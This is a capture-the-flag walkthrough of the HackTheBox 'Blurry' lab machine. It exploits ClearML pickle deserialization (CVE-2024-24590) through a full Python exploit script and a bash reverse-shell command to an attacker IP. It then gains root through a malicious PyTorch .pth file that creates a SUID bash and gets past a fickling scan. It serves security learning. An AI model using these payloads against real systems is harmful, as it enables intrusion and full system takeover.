Blurry – HackTheBox

- OS: Linux

- Difficulty: Medium

- Platform: HackTheBox

Summary

“Blurry” is a medium-difficulty Linux machine from the HackTheBox platform. An initial scan shows that the victim machine is running a website. We can create an account on this site and see that it is running a version of ClearML vulnerable to CVE-2024-24590. Abusing this vulnerability, we can execute code and gain initial access to the victim machine. Once inside, we find that we can run a script with sudo. This script runs a Python script that uses the PyTorch library. We can craft a malicious model for this library through a deserialization attack, which lets us execute system commands as root and take total control of the system.

User

We start with an Nmap scan:

❯ sudo nmap -sS --open -p- --min-rate=5000 -n -Pn -vvv 10.10.11.19 -oG allPorts

The scan shows only 2 open ports: 22 (SSH) and 80 (HTTP). I then scan them for service versions:

❯ sudo nmap -sVC -p22,80 10.10.11.19 -oN targeted

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-12 22:41 -04

Nmap scan report for 10.10.11.19

Host is up (0.19s latency).

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)

| ssh-hostkey:

| 3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)

| 256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)

|_ 256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)

80/tcp open http nginx 1.18.0

|_http-title: Did not follow redirect to http://app.blurry.htb/

|_http-server-header: nginx/1.18.0

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 17.77 seconds

From the output I see that the HTTP site on port 80 redirects to app.blurry.htb. So I add this domain, along with blurry.htb, to my /etc/hosts file:

❯ echo '10.10.11.19 blurry.htb app.blurry.htb' | sudo tee -a /etc/hosts

Before visiting the page itself I will use WhatWeb:

❯ whatweb -a 3 http://app.blurry.htb

http://app.blurry.htb [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.18.0], IP[10.10.11.19], Script[module], Title[ClearML], nginx[1.18.0]

Besides the server running Nginx and the page title being ClearML, this does not give much more information.

Visiting http://app.blurry.htb redirects to http://app.blurry.htb/login, where I can see a login page:

The page says it is using ClearML. Visiting its Github repository we have a description:



ClearML is an open source platform that automates and simplifies developing and managing machine learning solutions for thousands of data science teams all over the world.

The login only asks for a Full Name (rather than a username and a password). So I enter my alias gunzf0x and press Start. We are now inside the panel:

If I go to the upper right and click on my user and then on Settings option it redirects to http://app.blurry.htb/settings/profile, where I can see:

At the bottom right I can see something: WebApp: 1.13.1-426 • Server: 1.13.1-426 • API: 2.27. We have a version for ClearML.

Searching for exploits against this software I find CVE-2024-24590. Basically, it allows us to run arbitrary code through this software for versions 0.17.0 up to 1.14.2. Since, as we saw previously, our version is 1.13.1, I assume that this exploit should work. This post shows some examples of vulnerabilities, including CVE-2024-24590. They also provide a video explaining it. In short, we can embed code in a so-called pickle file. Pickle is a Python serialization module that is widely used in machine learning to store models and datasets; loading (unpickling) an untrusted pickle file can execute arbitrary code.
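The version comparison above can be sketched in a few lines of Python. This is only an illustration: the range bounds are the ones quoted in the text, and the helper names `parse_version` and `in_affected_range` are hypothetical, not part of ClearML.

```python
# Affected range as quoted in the text above (an assumption taken from the write-up).
LOWEST_AFFECTED = (0, 17, 0)
HIGHEST_AFFECTED = (1, 14, 2)


def parse_version(text: str) -> tuple:
    """Turn a string such as '1.13.1-426' into (1, 13, 1), dropping the build suffix."""
    core = text.split("-", 1)[0]
    return tuple(int(part) for part in core.split("."))


def in_affected_range(text: str) -> bool:
    """Return True when the version lies inside the quoted range (inclusive)."""
    return LOWEST_AFFECTED <= parse_version(text) <= HIGHEST_AFFECTED


# Version string shown at the bottom of the settings page.
reported = "1.13.1-426"
print(parse_version(reported), in_affected_range(reported))
```

Tuples compare element by element, so no extra version-parsing library is needed for simple dotted versions like this one.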



Now, we need a way to upload a malicious file. For this we can go to Projects -> Black Swan -> Experiments. There, we can see something like:



At the top left I can see + New Experiment. Click on it. A new window spawns:

and click on Create New Credentials.

Some new credentials should be generated. Copy them and save them into a file. For example, in my case it generated:

api {

web_server: http://app.blurry.htb

api_server: http://api.blurry.htb

files_server: http://files.blurry.htb

credentials {

"access_key" = "K0XERWBGD1WZV8FJ40CV"

"secret_key" = "Mu2bS0In3etDw49d5YF3q96dXfNnMu3PhWeJAoNMfwEfCwtFjE"

}

}

Here I note 2 new subdomains: api.blurry.htb and files.blurry.htb. I add these 2 new domains to my /etc/hosts file, so now it looks like:

❯ tail -n1 /etc/hosts

10.10.11.19 blurry.htb app.blurry.htb api.blurry.htb files.blurry.htb
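As a small convenience, the hostnames can also be pulled out of the generated configuration automatically. The following is a minimal sketch, assuming the configuration text has the `*_server: URL` layout shown above; the function name `hosts_line` is hypothetical, and the script only builds the line without touching /etc/hosts.

```python
import re
from urllib.parse import urlparse

# Server entries copied from the credentials generated by the web page.
CONFIG = """
api {
  web_server: http://app.blurry.htb
  api_server: http://api.blurry.htb
  files_server: http://files.blurry.htb
}
"""


def hosts_line(ip: str, config_text: str, extra=()) -> str:
    """Build one /etc/hosts line from every '*_server: URL' entry in the config."""
    names = list(extra)
    for url in re.findall(r"_server:\s*(\S+)", config_text):
        host = urlparse(url).hostname
        if host and host not in names:
            names.append(host)
    return f"{ip} {' '.join(names)}"


line = hosts_line("10.10.11.19", CONFIG, extra=("blurry.htb",))
print(line)
```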

The project also says that we should install clearml with pip (Python). I usually like to install Python packages in a virtual environment (venv), since they could break my system or I might never use them again once I’m done with the machine. First we create the virtual environment; in my case I will name it clearML_venv:

❯ python3 -m venv clearML_venv

Activate it:

❯ source clearML_venv/bin/activate

and install clearml on the virtual environment:

❯ pip3 install clearml

Finally, just run it:

❯ clearml-init

ClearML SDK setup process

Please create new clearml credentials through the settings page in your `clearml-server` web app (e.g. http://localhost:8080//settings/workspace-configuration)

Or create a free account at https://app.clear.ml/settings/workspace-configuration

In settings page, press "Create new credentials", then press "Copy to clipboard".

Paste copied configuration here:

It asks for credentials, so I just pass the credentials generated on the webpage and press enter:

❯ clearml-init

<SNIP>

Paste copied configuration here:

api {

web_server: http://app.blurry.htb

api_server: http://api.blurry.htb

files_server: http://files.blurry.htb

credentials {

"access_key" = "K0XERWBGD1WZV8FJ40CV"

"secret_key" = "Mu2bS0In3etDw49d5YF3q96dXfNnMu3PhWeJAoNMfwEfCwtFjE"

}

}

Detected credentials key="K0XERWBGD1WZV8FJ40CV" secret="Mu2b***"

ClearML Hosts configuration:

Web App: http://app.blurry.htb

API: http://api.blurry.htb

File Store: http://files.blurry.htb

Verifying credentials ...

Credentials verified!

New configuration stored in /home/gunzf0x/clearml.conf

ClearML setup completed successfully.

Now, the PoC video uses 2 files to execute the attack. This can be simplified using only 1 Python file. For this I create the exploit, which I save as malicious_pickle.py:

import pickle
import os
from clearml import Task
import argparse


def parse_args()->argparse.Namespace:
    """
    Get arguments from the user
    """
    parser = argparse.ArgumentParser(description="Clear ML Remote Code Execution.")
    parser.add_argument('-c', '--command', required=True, help='Command to run on the target machine')
    return parser.parse_args()


class RunCommand:
    def __init__(self, command):
        self.command = command

    def __reduce__(self):
        return (os.system, (str(self.command),))


def main()->None:
    print("[+] Creating task...")
    # Create the task
    task = Task.init(project_name='Black Swan', task_name='Exploit', tags=["review"])
    # Get the command from the user
    args: argparse.Namespace = parse_args()
    # Create the command class
    command = RunCommand(args.command)
    # Name the pickle file
    pickle_filename: str = 'exploit_pickle.pkl'
    # Create the file with the command
    print("[+] Creating pickle file...")
    with open(pickle_filename, 'wb') as f:
        pickle.dump(command, f)
    # Upload the command
    print("[+] Uploading pickle file as artifact...")
    task.upload_artifact(name=pickle_filename.replace('.pkl',''), artifact_object=command, retries=2, wait_on_upload=True, extension_name=".pkl")
    print("[+] Done")


if __name__ == "__main__":
    main()
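The RunCommand class above relies on how pickle treats `__reduce__`: when the object is loaded, pickle calls the returned callable with the returned arguments and hands back its result. A harmless sketch of the same mechanism, using the builtin `len` instead of `os.system` (the class name `Demo` is made up for illustration):

```python
import pickle


class Demo:
    """Stand-in for RunCommand that calls a harmless builtin on load."""

    def __reduce__(self):
        # pickle stores "call len('abc')" instead of the object itself.
        return (len, ("abc",))


blob = pickle.dumps(Demo())

# Loading runs len("abc"); the result replaces the original object.
restored = pickle.loads(blob)
print(type(restored).__name__, restored)
```

Note that the loaded value is the return value of the callable, not a `Demo` instance. With `os.system` as the callable, that return value is the integer exit status of the command.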

First, I always like to send a ping to my attacker machine to check that I have effectively achieved Remote Code Execution. For this I start a listener with tcpdump for ICMP traffic:

❯ sudo tcpdump -ni tun0 icmp

and run my exploit:

❯ python3 malicious_pickle.py -c 'ping -c1 10.10.16.9'

[+] Creating task...

ClearML Task: created new task id=854bb35ce8b5405a8cf8596dbb635314

2024-07-12 23:57:57,217 - clearml.Task - INFO - No repository found, storing script code instead

ClearML results page: http://app.blurry.htb/projects/116c40b9b53743689239b6b460efd7be/experiments/854bb35ce8b5405a8cf8596dbb635314/output/log

[+] Creating pickle file...

[+] Uploading pickle file as artifact...

ClearML Monitor: GPU monitoring failed getting GPU reading, switching off GPU monitoring

[+] Done

where I have used the command ping -c1 10.10.16.9, where 10.10.16.9 is my attacker IP address.

I get something on my listener:

❯ sudo tcpdump -ni tun0 icmp

tcpdump: verbose output suppressed, use -v[v]... for full protocol decode

listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes

23:58:02.894216 IP 10.10.11.19 > 10.10.16.9: ICMP echo request, id 1306, seq 1, length 64

23:58:02.894236 IP 10.10.16.9 > 10.10.11.19: ICMP echo reply, id 1306, seq 1, length 64

so the command worked.

Therefore, I send myself a reverse shell using bash -c "bash -i >& /dev/tcp/10.10.16.9/443 0>&1", where 10.10.16.9 is my attacker IP and 443 is the port on which I will listen with netcat:

❯ nc -lvnp 443

and in another panel/window run the exploit:

❯ python3 malicious_pickle.py -c 'bash -c "bash -i >& /dev/tcp/10.10.16.9/443 0>&1"'

[+] Creating task...

ClearML Task: created new task id=d3143c5f75b74a82a6cd91b8ea361ff1

2024-07-13 00:03:28,646 - clearml.Task - INFO - No repository found, storing script code instead

ClearML results page: http://app.blurry.htb/projects/116c40b9b53743689239b6b460efd7be/experiments/d3143c5f75b74a82a6cd91b8ea361ff1/output/log

[+] Creating pickle file...

[+] Uploading pickle file as artifact...

ClearML Monitor: GPU monitoring failed getting GPU reading, switching off GPU monitoring

[+] Done

After a few seconds I get a shell as the jippity user:

❯ nc -lvnp 443

listening on [any] 443 ...

connect to [10.10.16.9] from (UNKNOWN) [10.10.11.19] 37334

bash: cannot set terminal process group (4664): Inappropriate ioctl for device

bash: no job control in this shell

jippity@blurry:~$ whoami

whoami

jippity

We can now read the user flag in the jippity home directory.

Root

I start by checking whether this user can run any command with sudo:

jippity@blurry:~$ sudo -l

Matching Defaults entries for jippity on blurry:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jippity may run the following commands on blurry:

(root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth

jippity@blurry:~$

and we can run evaluate_model with any .pth file within /models directory.

I check my permissions for /models directory:

jippity@blurry:~$ ls -la /

total 72

drwxr-xr-x 19 root root 4096 Jun 3 09:28 .

drwxr-xr-x 19 root root 4096 Jun 3 09:28 ..

lrwxrwxrwx 1 root root 7 Nov 7 2023 bin -> usr/bin

drwxr-xr-x 3 root root 4096 Jun 3 09:28 boot

drwxr-xr-x 16 root root 3020 Jul 12 22:36 dev

<SNIP>

drwxr-xr-x 2 root root 4096 Nov 7 2023 mnt

drwxrwxr-x 2 root jippity 4096 Jun 17 14:11 models

drwxr-xr-x 4 root root 4096 Feb 14 11:47 opt

<SNIP>

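Here I see that the directory is owned by root with group jippity, and that the group has write permission, so I can write files to it.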
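The permission string can also be checked programmatically. The sketch below uses the standard `stat` module on a mode value that mirrors the `drwxrwxr-x` entry from the listing; on the target itself the mode would come from `os.stat('/models').st_mode` instead. The function name `group_can_write` is hypothetical.

```python
import stat


def group_can_write(mode: int) -> bool:
    """Return True when the group-write bit is set in a st_mode value."""
    return bool(mode & stat.S_IWGRP)


# Mode mirroring the /models entry in the listing (directory, rwxrwxr-x).
models_mode = stat.S_IFDIR | 0o775
# Mode mirroring an ordinary root-owned directory such as /opt (rwxr-xr-x).
opt_mode = stat.S_IFDIR | 0o755

print(stat.filemode(models_mode), group_can_write(models_mode))
print(stat.filemode(opt_mode), group_can_write(opt_mode))
```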

If I also check what is inside /models directory we have:

jippity@blurry:~$ ls -la /models

total 1068

drwxrwxr-x 2 root jippity 4096 Jun 17 14:11 .

drwxr-xr-x 19 root root 4096 Jun 3 09:28 ..

-rw-r--r-- 1 root root 1077880 May 30 04:39 demo_model.pth

-rw-r--r-- 1 root root 2547 May 30 04:38 evaluate_model.py

However, demo_model.pth is a binary file, so attempting to read it just prints a bunch of unreadable characters.

Reading /models/evaluate_model.py returns the file:

import torch
import torch.nn as nn
from torchvision import transforms
from torchvision.datasets import CIFAR10
from torch.utils.data import DataLoader, Subset
import numpy as np
import sys


class CustomCNN(nn.Module):
    def __init__(self):
        super(CustomCNN, self).__init__()
        self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=3, padding=1)
        self.conv2 = nn.Conv2d(in_channels=16, out_channels=32, kernel_size=3, padding=1)
        self.pool = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)
        self.fc1 = nn.Linear(in_features=32 * 8 * 8, out_features=128)
        self.fc2 = nn.Linear(in_features=128, out_features=10)
        self.relu = nn.ReLU()

    def forward(self, x):
        x = self.pool(self.relu(self.conv1(x)))
        x = self.pool(self.relu(self.conv2(x)))
        x = x.view(-1, 32 * 8 * 8)
        x = self.relu(self.fc1(x))
        x = self.fc2(x)
        return x


def load_model(model_path):
    model = CustomCNN()
    state_dict = torch.load(model_path)
    model.load_state_dict(state_dict)
    model.eval()
    return model


def prepare_dataloader(batch_size=32):
    transform = transforms.Compose([
        transforms.RandomHorizontalFlip(),
        transforms.RandomCrop(32, padding=4),
        transforms.ToTensor(),
        transforms.Normalize(mean=[0.4914, 0.4822, 0.4465], std=[0.2023, 0.1994, 0.2010]),
    ])
    dataset = CIFAR10(root='/root/datasets/', train=False, download=False, transform=transform)
    subset = Subset(dataset, indices=np.random.choice(len(dataset), 64, replace=False))
    dataloader = DataLoader(subset, batch_size=batch_size, shuffle=False)
    return dataloader


def evaluate_model(model, dataloader):
    correct = 0
    total = 0
    with torch.no_grad():
        for images, labels in dataloader:
            outputs = model(images)
            _, predicted = torch.max(outputs.data, 1)
            total += labels.size(0)
            correct += (predicted == labels).sum().item()
    accuracy = 100 * correct / total
    print(f'[+] Accuracy of the model on the test dataset: {accuracy:.2f}%')


def main(model_path):
    model = load_model(model_path)
    print("[+] Loaded Model.")
    dataloader = prepare_dataloader()
    print("[+] Dataloader ready. Evaluating model...")
    evaluate_model(model, dataloader)


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python script.py <path_to_model.pth>")
    else:
        model_path = sys.argv[1] # Path to the .pth file
        main(model_path)

This script uses the Torch (or PyTorch) library to load the model. Searching for deserialization attacks against PyTorch, we find this Github issue explaining that code can be injected when the function torch.load(model) is used, since it relies on pickle to read the file. This is the case for the script.

Following the instructions of how to use the Python script, I run:

jippity@blurry:~$ python3 /models/evaluate_model.py /models/demo_model.pth

[+] Loaded Model.

Traceback (most recent call last):

File "/models/evaluate_model.py", line 76, in <module>

main(model_path)

File "/models/evaluate_model.py", line 67, in main

dataloader = prepare_dataloader()

File "/models/evaluate_model.py", line 46, in prepare_dataloader

dataset = CIFAR10(root='/root/datasets/', train=False, download=False, transform=transform)

File "/usr/local/lib/python3.9/dist-packages/torchvision/datasets/cifar.py", line 68, in __init__

raise RuntimeError("Dataset not found or corrupted. You can use download=True to download it")

RuntimeError: Dataset not found or corrupted. You can use download=True to download it

It loads the model, but then fails with an error: the dataset is expected under /root/datasets/, which presumably cannot be read by the jippity user.

The thing here is that the program we can run with sudo is /usr/bin/evaluate_model (not the Python script shown before), which shares its name with /models/evaluate_model.py. I note that /usr/bin/evaluate_model is just a Bash script that runs evaluate_model.py. The content of /usr/bin/evaluate_model is:

#!/bin/bash
# Evaluate a given model against our proprietary dataset.
# Security checks against model file included.

if [ "$#" -ne 1 ]; then
    /usr/bin/echo "Usage: $0 <path_to_model.pth>"
    exit 1
fi

MODEL_FILE="$1"
TEMP_DIR="/models/temp"
PYTHON_SCRIPT="/models/evaluate_model.py"

/usr/bin/mkdir -p "$TEMP_DIR"

file_type=$(/usr/bin/file --brief "$MODEL_FILE")

# Extract based on file type
if [[ "$file_type" == *"POSIX tar archive"* ]]; then
    # POSIX tar archive (older PyTorch format)
    /usr/bin/tar -xf "$MODEL_FILE" -C "$TEMP_DIR"
elif [[ "$file_type" == *"Zip archive data"* ]]; then
    # Zip archive (newer PyTorch format)
    /usr/bin/unzip -q "$MODEL_FILE" -d "$TEMP_DIR"
else
    /usr/bin/echo "[!] Unknown or unsupported file format for $MODEL_FILE"
    exit 2
fi

/usr/bin/find "$TEMP_DIR" -type f \( -name "*.pkl" -o -name "pickle" \) -print0 | while IFS= read -r -d $'\0' extracted_pkl; do
    fickling_output=$(/usr/local/bin/fickling -s --json-output /dev/fd/1 "$extracted_pkl")

    if /usr/bin/echo "$fickling_output" | /usr/bin/jq -e 'select(.severity == "OVERTLY_MALICIOUS")' >/dev/null; then
        /usr/bin/echo "[!] Model $MODEL_FILE contains OVERTLY_MALICIOUS components and will be deleted."
        /bin/rm "$MODEL_FILE"
        break
    fi
done

/usr/bin/find "$TEMP_DIR" -type f -exec /bin/rm {} +
/bin/rm -rf "$TEMP_DIR"

if [ -f "$MODEL_FILE" ]; then
    /usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
    /usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"
fi
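The wrapper above hands every extracted pickle file to fickling for static analysis before the model is loaded. To give a rough idea of what static inspection of a pickle means, here is a minimal sketch using only the standard `pickletools` module. It is not how fickling works internally (that is not shown in this write-up); the class `Payload` and the function `summarize` are made up for illustration, and nothing in the sketch executes the embedded command.

```python
import os
import pickle
import pickletools


class Payload:
    """Object whose pickle asks the loader to call os.system('id')."""

    def __reduce__(self):
        return (os.system, ("id",))


# Serializing does NOT run the command; only loading would.
blob = pickle.dumps(Payload(), protocol=2)


def summarize(data: bytes):
    """Walk the opcodes without unpickling; collect imported names and REDUCE calls."""
    imported, calls = [], 0
    for opcode, arg, _position in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            imported.append(arg)  # e.g. "posix system" on Linux
        elif opcode.name == "REDUCE":
            calls += 1
    return imported, calls


imported, calls = summarize(blob)
print(imported, calls)
```

A scanner can then flag pickles that import dangerous callables and invoke them with REDUCE. Protocol 2 is used here only because it stores the import as a single GLOBAL opcode, which keeps the sketch short.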

If I run the script I get:

jippity@blurry:~$ sudo /usr/bin/evaluate_model /models/demo_model.pth

[+] Model /models/demo_model.pth is considered safe. Processing...

[+] Loaded Model.

[+] Dataloader ready. Evaluating model...

[+] Accuracy of the model on the test dataset: 71.88%

So the plan is to create a malicious .pth file that executes a system command when the PyTorch library loads it, in a kind of deserialization attack. For this we can create the following simple Python script, which defines a small model class and saves it as a .pth file that executes a command on load:

import torch
import torch.nn as nn
import torch.nn.functional as F
import os


# Create a simple model
class Net(nn.Module):
    def __init__(self):
        super(Net, self).__init__()
        self.layer1 = nn.Linear(1, 128)
        self.layer2 = nn.Linear(128, 128)
        self.layer3 = nn.Linear(128, 2)

    def forward(self, x):
        x = F.relu(self.layer1(x))
        x = F.relu(self.layer2(x))
        action = self.layer3(x)
        return action

    def __reduce__(self):
        return (os.system, ('cp $(which bash) /tmp/gunzf0x; chmod 4755 /tmp/gunzf0x',))


if __name__ == '__main__':
    a = Net()
    torch.save(a, '/models/gunzf0x.pth')

Here I am creating a .pth file that, when loaded, copies the bash binary to /tmp/gunzf0x and sets the SUID bit on that copy (mode 4755). Since the loader runs as root, the copy will be owned by root. I save this script as /tmp/create_malicious_pth.py and run it:

jippity@blurry:/tmp$ python3 create_malicious_pth.py

This creates a malicious .pth file called /models/gunzf0x.pth:

jippity@blurry:/tmp$ ls -la /models

total 1072

drwxrwxr-x 2 root jippity 4096 Jul 13 01:02 .

drwxr-xr-x 19 root root 4096 Jun 3 09:28 ..

-rw-r--r-- 1 root root 1077880 May 30 04:39 demo_model.pth

-rw-r--r-- 1 root root 2547 May 30 04:38 evaluate_model.py

-rw-r--r-- 1 jippity jippity 928 Jul 13 01:02 gunzf0x.pth

Finally, just execute the script with sudo. As expected, it throws an error, because torch.load returns the integer exit status of os.system instead of a state dict:

jippity@blurry:/tmp$ sudo /usr/bin/evaluate_model /models/gunzf0x.pth

[+] Model /models/gunzf0x.pth is considered safe. Processing...

Traceback (most recent call last):

File "/models/evaluate_model.py", line 76, in <module>

main(model_path)

File "/models/evaluate_model.py", line 65, in main

model = load_model(model_path)

File "/models/evaluate_model.py", line 33, in load_model

model.load_state_dict(state_dict)

File "/usr/local/lib/python3.9/dist-packages/torch/nn/modules/module.py", line 2104, in load_state_dict

raise TypeError(f"Expected state_dict to be dict-like, got {type(state_dict)}.")

TypeError: Expected state_dict to be dict-like, got <class 'int'>.

However, if we check whether our malicious binary has been created:

jippity@blurry:/tmp$ ls -la /tmp

total 1252

drwxrwxrwt 10 root root 4096 Jul 13 01:03 .

drwxr-xr-x 19 root root 4096 Jun 3 09:28 ..

-rw-r--r-- 1 jippity jippity 634 Jul 13 01:02 create_malicious_pth.py

drwxrwxrwt 2 root root 4096 Jul 12 22:36 .font-unix

-rwsr-xr-x 1 root root 1234376 Jul 13 01:03 gunzf0x

<SNIP>

It’s there!
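The `s` in `-rwsr-xr-x` is the SUID bit set by `chmod 4755`. A short sketch with the standard `stat` module shows how that mode maps to the listing and how the bit could be tested; the mode value is built by hand to mirror the listing, while on the target it would come from `os.stat('/tmp/gunzf0x').st_mode`. The function name `is_setuid` is hypothetical.

```python
import stat


def is_setuid(mode: int) -> bool:
    """Return True when the set-user-ID bit is present in a st_mode value."""
    return bool(mode & stat.S_ISUID)


# Regular file with mode 4755, as set by the payload's chmod.
suid_bash_mode = stat.S_IFREG | 0o4755
# Regular file with mode 0755, i.e. an ordinary executable.
plain_mode = stat.S_IFREG | 0o755

print(stat.filemode(suid_bash_mode), is_setuid(suid_bash_mode))
print(stat.filemode(plain_mode), is_setuid(plain_mode))
```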

We just execute that file with the -p flag, which makes bash keep the effective UID of the file owner (root), and that’s it:

jippity@blurry:/tmp$ /tmp/gunzf0x -p

gunzf0x-5.1# whoami

root

We can read the root flag at /root directory.

~ Happy Hacking